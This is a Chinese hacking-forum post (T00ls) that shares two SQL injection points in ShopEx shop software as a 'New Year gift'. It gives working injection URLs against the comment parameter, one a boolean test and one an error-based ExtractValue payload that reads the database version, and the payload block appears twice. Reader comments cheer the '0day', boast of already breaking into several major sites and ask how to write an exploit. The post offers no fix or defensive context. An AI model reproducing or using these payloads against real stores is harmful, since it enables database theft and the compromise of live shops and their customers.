T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
关于作者
评论90次
谢谢大牛的分享精神
很详细 可以推广
求姿势~
楼主V5 mark了
来晚啦 哈哈
这个洞大 通杀了 谢谢
已经搞下好几个重磅的了……真乃人间胸器!
ecshop 本来就惹人喜欢。!
学xi学xi。感谢分享。
0day啊,看来shopex又要遭殃了
过年都出来晒洞洞了哈。。。
非常感谢。。。。
真是0day多多啊
是否可以找出未被重写的url,以便写exp
哈哈 大牛啊 估计已经出过补丁了吧
哈哈,新年没白过
是不是被封了已经? 今天遇见一个失败了
这个也收藏了。好东西啊